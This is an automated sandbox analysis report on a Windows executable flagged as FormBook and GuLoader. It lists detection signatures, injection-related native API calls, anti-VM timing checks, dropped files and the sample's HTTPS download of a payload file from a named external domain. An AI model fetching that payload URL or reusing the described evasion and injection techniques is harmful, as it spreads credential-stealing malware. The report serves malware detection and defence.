Windows Analysis Report
Ntwph4urc1.exe

Overview

General Information

Sample name: Ntwph4urc1.exe (renamed because the original name is a hash value)
Original sample name: ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
Analysis ID: 1588721
MD5: c57da1bb37a79e6f05722518dbadb3ce
SHA1: c7d63301754e2a380d29a9170654670e4beeb1ad
SHA256: ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
Tags: exe, user-adrian__luca
Detection

FormBook, GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Ntwph4urc1.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
    • Ntwph4urc1.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1847253587.000000000507C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T04:50:56.106860+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49974 | 122.201.127.17 | 443 | TCP

AV Detection

Source: Ntwph4urc1.exe | Virustotal: Detection: 75%
Source: Ntwph4urc1.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Ntwph4urc1.exe | Joe Sandbox ML: detected
Source: Ntwph4urc1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 122.201.127.17:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: Ntwph4urc1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb | source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP | source: Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000365BD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003676F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000365BD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003676F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP | source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_0040674C FindFirstFileW,FindClose,5_2_0040674C
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405B00
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_00402902 FindFirstFileW,5_2_00402902
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49974 -> 122.201.127.17:443
Source: global traffic | HTTP traffic detected: GET /yzSJO174.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: babalharra.com.au Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: babalharra.com.au
Source: Ntwph4urc1.exe, 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000005.00000000.1271388183.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000009.00000000.1839438284.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/
Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/o
Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2624860948.0000000006880000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/yzSJO174.bin
Source: Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/yzSJO174.binF
Source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown | Network traffic detected: HTTP traffic on port 49974 -> 443
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405595

E-Banking Fraud

Source: Yara match | File source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_369935C0 NtCreateMutant,LdrInitializeThunk,9_2_369935C0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_36992DF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36993090 NtSetValueKey,9_2_36993090
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36993010 NtOpenDirectoryObject,9_2_36993010
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36993D10 NtOpenProcessToken,9_2_36993D10
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36993D70 NtOpenThread,9_2_36993D70
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_369939B0 NtGetContextThread,9_2_369939B0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36994650 NtSuspendThread,9_2_36994650
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36994340 NtSetContextThread,9_2_36994340
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992E80 NtReadVirtualMemory,9_2_36992E80
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992EA0 NtAdjustPrivilegesToken,9_2_36992EA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992EE0 NtQueueApcThread,9_2_36992EE0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992E30 NtWriteVirtualMemory,9_2_36992E30
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992F90 NtProtectVirtualMemory,9_2_36992F90
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992FB0 NtResumeThread,9_2_36992FB0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992FA0 NtQuerySection,9_2_36992FA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992FE0 NtCreateFile,9_2_36992FE0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992F30 NtCreateSection,9_2_36992F30
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992F60 NtCreateProcessEx,9_2_36992F60
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992CA0 NtQueryInformationToken,9_2_36992CA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992CC0 NtQueryVirtualMemory,9_2_36992CC0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992CF0 NtOpenProcess,9_2_36992CF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992C00 NtQueryInformationProcess,9_2_36992C00
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992C70 NtFreeVirtualMemory,9_2_36992C70
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992C60 NtCreateKey,9_2_36992C60
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992DB0 NtEnumerateKey,9_2_36992DB0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992DD0 NtDelayExecution,9_2_36992DD0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992D10 NtMapViewOfSection,9_2_36992D10
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992D00 NtSetInformationFile,9_2_36992D00
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992D30 NtUnmapViewOfSection,9_2_36992D30
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992AB0 NtWaitForSingleObject,9_2_36992AB0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992AD0 NtReadFile,9_2_36992AD0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992AF0 NtWriteFile,9_2_36992AF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992B80 NtQueryInformationFile,9_2_36992B80
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992BA0 NtEnumerateValueKey,9_2_36992BA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992BF0 NtAllocateVirtualMemory,9_2_36992BF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992BE0 NtQueryValueKey,9_2_36992BE0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 9_2_36992B60 NtClose,9_2_36992B60
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A2
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 369A7E54 appears 101 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 369DF290 appears 105 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 369CEA12 appears 86 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 3694B970 appears 272 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 36995130 appears 58 times
Source: Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000366E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
Source: Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
Source: Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003689C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
Source: classification engine | Classification label: mal80.troj.evad.winEXE@3/5@1/1
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_00404835 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404835
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 5_2_004021A2 CoCreateInstance,5_2_004021A2
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user~1\AppData\Local\Temp\nspB49F.tmp
Source: Ntwph4urc1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File read: C:\Users\user\Desktop\Ntwph4urc1.exe
Source: unknown | Process created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Process created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

      Data Obfuscation

      Source: Yara match File source: 00000005.00000002.1847253587.000000000507C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 5_2_74351B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 5_2_74351B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3692135D push eax; iretd 9_2_36921369
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369227FA pushad ; ret 9_2_369227F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3692225F pushad ; ret 9_2_369227F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3692283D push eax; iretd 9_2_36922858
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369509AD push ecx; mov dword ptr [esp], ecx 9_2_369509B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe File created: C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Vaabenstyringssystemernes.War
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.biv
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.sti
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Ntwph4urc1.exe API/Special instruction interceptor: Address: 58B806C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe API/Special instruction interceptor: Address: 29A806C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe RDTSC instruction interceptor: First address: 587AAC2 second address: 587AAC2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA4912AC715h 0x00000006 cmp ah, FFFFFFE4h 0x00000009 cmp ch, ah 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe RDTSC instruction interceptor: First address: 296AAC2 second address: 296AAC2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA490DA4C15h 0x00000006 cmp ah, FFFFFFE4h 0x00000009 cmp ch, ah 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369CD1C0 rdtsc 9_2_369CD1C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe API coverage: 0.1 %
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 5_2_0040674C FindFirstFileW,FindClose, 5_2_0040674C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 5_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 5_2_00405B00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 5_2_00402902 FindFirstFileW, 5_2_00402902
      Source: Ntwph4urc1.exe, 00000009.00000003.2275454496.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275603811.00000000069CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)J5
      Source: Ntwph4urc1.exe, 00000009.00000003.2275454496.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275603811.00000000069CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe API call chain: ExitProcess graph end node graph_5-4303
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe API call chain: ExitProcess graph end node graph_5-4455
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369CD1C0 rdtsc 9_2_369CD1C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369935C0 NtCreateMutant,LdrInitializeThunk, 9_2_369935C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 5_2_74351B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 5_2_74351B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D368C mov eax, dword ptr fs:[00000030h] 9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D368C mov eax, dword ptr fs:[00000030h] 9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D368C mov eax, dword ptr fs:[00000030h] 9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D368C mov eax, dword ptr fs:[00000030h] 9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369476B2 mov eax, dword ptr fs:[00000030h] 9_2_369476B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369476B2 mov eax, dword ptr fs:[00000030h] 9_2_369476B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369476B2 mov eax, dword ptr fs:[00000030h] 9_2_369476B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694D6AA mov eax, dword ptr fs:[00000030h] 9_2_3694D6AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694D6AA mov eax, dword ptr fs:[00000030h] 9_2_3694D6AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0D6F0 mov eax, dword ptr fs:[00000030h] 9_2_36A0D6F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h] 9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h] 9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h] 9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h] 9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h] 9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h] 9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369816CF mov eax, dword ptr fs:[00000030h] 9_2_369816CF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0F6C7 mov eax, dword ptr fs:[00000030h] 9_2_36A0F6C7
